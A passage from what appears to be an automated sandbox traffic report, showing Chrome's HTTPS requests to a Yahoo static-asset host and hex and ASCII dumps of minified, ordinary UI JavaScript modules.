                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 72 3a 6e 75 6c 6c 7d 2c 6e 65 2e 73 6c 69 64 65 72 49 74 65 6d 73 3d 4d 28 6e 65 2e 73 6c 69 64 65 72 45 6c 65 6d 2e 63 68 69 6c 64 72 65 6e 29 3b 76 61 72 20 6c 65 3d 6e 65 2e 73 6c 69 64 65 72 49 74 65 6d 73 2e 6c 65 6e 67 74 68 3b 69 66 28 75 2e 5f 73 74 61 74 65 2e 73 6c 69 64 65 57 69 64 74 68 3d 31 30 30 2f 6c 65 2c 75 2e 75 70 64 61 74 65 57 69 64 74 68 28 29 2c 58 28 6e 65 2e 73 6c 69 64 65 72 45 6c 65 6d 2c 22 74 72 61 6e 73 66 6f 72 6d 22 2c 6e 65 2e 74 72 61 6e 73 69 74 69 6f 6e 44 75 72 61 74 69 6f 6e 2c 6e 65 2e 74 72 61 6e 73 69 74 69 6f 6e 54 69 6d 69 6e 67 46 75 6e 63 74 69 6f 6e 29 2c 51 28 6e 65 2e 73 6c 69 64 65 72 45 6c 65 6d 2c 22 2d 77 65 62 6b 69 74 2d 67 72 61 62 22 29 2c 6e 65 2e 65 64 67 65 50 61 64 64 69 6e 67 50 65 72 63 65 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: r:null},ne.sliderItems=M(ne.sliderElem.children);var le=ne.sliderItems.length;if(u._state.slideWidth=100/le,u.updateWidth(),X(ne.sliderElem,"transform",ne.transitionDuration,ne.transitionTimingFunction),Q(ne.sliderElem,"-webkit-grab"),ne.edgePaddingPercen
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 64 65 72 49 74 65 6d 73 5b 72 5d 3b 73 3d 65 21 3d 3d 61 2c 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 68 69 64 64 65 6e 22 2c 73 2b 22 22 29 3b 76 61 72 20 6e 3d 4e 28 61 29 3b 73 3f 6e 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 61 62 69 6e 64 65 78 22 2c 22 2d 31 22 29 7d 29 3a 6e 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 22 74 61 62 69 6e 64 65 78 22 29 7d 29 7d 7d 7d 2c 7b 6b 65 79 3a 22 73 63 72 6f 6c 6c 56 69 65 77 57 69 74 68 4e 61 74 69 76 65 53 79 6e 63 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 74 68 69 73 2e 5f 73 74 61 74 65 2e 6c 6f 63 6b 65 64 29 7b 76
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: derItems[r];s=e!==a,a.setAttribute("aria-hidden",s+"");var n=N(a);s?n.forEach(function(e){e.setAttribute("tabindex","-1")}):n.forEach(function(e){e.removeAttribute("tabindex")})}}},{key:"scrollViewWithNativeSync",value:function(){if(!this._state.locked){v


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    117192.168.2.44987887.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC364OUTGET /aaq/wf/wf-bind-1.1.3-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC743INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: Cs4/LueSzX26S1++8FtOt4gK0i3LcGtpimbBce+dE7cSNwF65BzX2hO8S4t6Fmg9LQ6idM+gc3Q=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: QW8TJ77XDE3B0PVR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Fri, 27 Sep 2024 14:10:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 11 Jan 2022 10:14:03 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "9fba2531ffa6cb0b4d3d34c56c295495"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-version-id: Qyt1s0oNtpHMZryrsEe7nbfplEXvu_oO
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 3666
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 270605
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 62 69 6e 64 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 62 69 6e 64 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 7c 7c 7b 7d 2c 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-bind",[],t):"object"==typeof exports?exports["wafer-bind"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2c 74 29 3a 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 74 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 73 20 61 20 66 75 6e 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}function a(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a func
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1066INData Raw: 29 7b 76 61 72 20 72 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 7b 7d 2c 69 3d 72 2e 73 65 6c 65 63 74 6f 72 3b 6f 28 74 68 69 73 2c 74 29 3b 66 6f 72 28 76 61 72 20 61 3d 5b 5d 2c 66 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 75 3d 30 3b 75 3c 66 2e 6c 65 6e 67 74 68 3b 75 2b 2b 29 7b 76 61 72 20 73 3d 66 5b 75 5d 2e 6e 61 6d 65 2e 6d 61 74 63 68 28 70 29 3b 73 26 26 73 5b 31 5d 26 26 61 2e 70 75 73 68 28 73 5b 31 5d 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 7d 76 61 72 20 6c 3d 6e 28 74 68 69 73 2c 28 74 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 29 29 2e 63 61 6c 6c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ){var r=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},i=r.selector;o(this,t);for(var a=[],f=e.attributes,u=0;u<f.length;u++){var s=f[u].name.match(p);s&&s[1]&&a.push(s[1].toLowerCase())}var l=n(this,(t.__proto__||Object.getPrototypeOf(t)).call


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    118192.168.2.44988087.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC542OUTGET /aaq/wf/wf-countdown-1.2.5-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC764INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: 6N3YwF0qFX1eYv8wuX+0MPAw/nxnB0c0rvRcMf6ZMsldeGl9w5TBjolojyNldFXY9xFdc7I2nET5noWbgGc2+3bjh0uc2Zs5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: GF7P8K11D76GDRET
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Thu, 26 Sep 2024 13:54:30 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Sun, 13 Sep 2020 18:50:05 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "681d57e9e7cbef5de44544c13f8ca62e"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public,max-age=315360000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-version-id: CQ1lP8549yVnp28g4QLu9GcN8rB3ImgO
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 4348
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 357993
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 63 6f 75 6e 74 64 6f 77 6e 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 63 6f 75 6e 74 64 6f 77 6e 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-countdown",[],t):"object"==typeof exports?exports["wafer-countdown"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wa
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 74 26 26 6e 75 6c 6c 21 3d 3d 74 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 2c 20 6e 6f 74 20 22 2b 74 79 70 65 6f 66 20 74 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: t&&null!==t)throw new TypeError("Super expression must either be null or a function, not "+typeof t);e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeO
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 65 78 65 63 28 6e 29 2c 73 3d 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 29 26 26 61 5b 31 5d 3b 73 26 26 28 6e 3d 73 29 7d 69 66 28 6e 29 7b 76 61 72 20 75 3d 6c 28 6e 29 2c 69 3d 6e 65 77 20 4d 61 70 3b 75 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 73 65 74 28 65 2c 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 22 77 61 66 65 72 2d 63 6f 75 6e 74 64 6f 77 6e 2d 22 2b 65 29 5b 30 5d 29 7d 29 3b 76 61 72 20 66 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 77 66 2d 63 6f 75 6e 74 64 6f 77 6e 2d 65 6e 64 64 61 74 65 22 29 3b 66 26 26 69 2e 73 69 7a 65 3d 3d 3d 75 2e 6c 65 6e 67 74 68 26 26 74 68 69 73 2e 73 65 74 75 70 43 6f 75 6e 74 28 69 2c 66 2c 6f 29 7d 7d 72 65 74 75 72 6e 20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: exec(n),s=Array.isArray(a)&&a[1];s&&(n=s)}if(n){var u=l(n),i=new Map;u.forEach(function(e){i.set(e,t.getElementsByClassName("wafer-countdown-"+e)[0])});var f=t.getAttribute("data-wf-countdown-enddate");f&&i.size===u.length&&this.setupCount(i,f,o)}}return
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC448INData Raw: 74 54 69 6d 65 49 6e 74 65 72 76 61 6c 29 7d 7d 5d 29 2c 65 7d 28 29 2c 70 3d 77 2c 68 3d 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 63 6f 6e 74 72 6f 6c 6c 65 72 73 2e 57 61 66 65 72 42 61 73 65 43 6f 6e 74 72 6f 6c 6c 65 72 2c 79 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 29 7b 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 7b 7d 2c 6e 3d 65 2e 72 6f 6f 74 2c 72 3d 76 6f 69 64 20 30 3d 3d 3d 6e 3f 64 6f 63 75 6d 65 6e 74 3a 6e 2c 73 3d 65 2e 73 65 6c 65 63 74 6f 72 2c 75 3d 76 6f 69 64 20 30 3d 3d 3d 73 3f 22 2e 77 61 66 65 72 2d 63 6f 75 6e 74 64 6f 77 6e 22 3a 73 3b 6f 28 74 68 69 73 2c 74 29
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: tTimeInterval)}}]),e}(),p=w,h=window.wafer.controllers.WaferBaseController,y=function(e){function t(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:{},n=e.root,r=void 0===n?document:n,s=e.selector,u=void 0===s?".wafer-countdown":s;o(this,t)


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    119192.168.2.44987987.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC538OUTGET /aaq/wf/wf-benji-1.2.0-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC775INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: i3Wh3fDh53VDHfHuae2H1u+HB0hwKw6QhHfogK8Fsgx99lt8nSSsca5N7SqdnHDlwMSNYXEnLTJ0hUBQJZ4Rqe2ILP4WLfiPrJTZo4ZLzUw=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: WBK54NSJXHSK76EJ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Thu, 26 Sep 2024 10:07:38 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Mon, 20 May 2024 21:26:01 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "11cf4f9bff98fc79f8eecf2894832023"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-version-id: tIzwVm575mAKu9xUI7zQ09wGt6PpRi8K
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 8353
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 371606
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 62 65 6e 6a 69 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 62 65 6e 6a 69 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 7c 7c 7b 7d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-benji",[],t):"object"==typeof exports?exports["wafer-benji"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2c 74 29 3a 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 74 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 73 20 61 20 66
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: totype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}function a(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a f
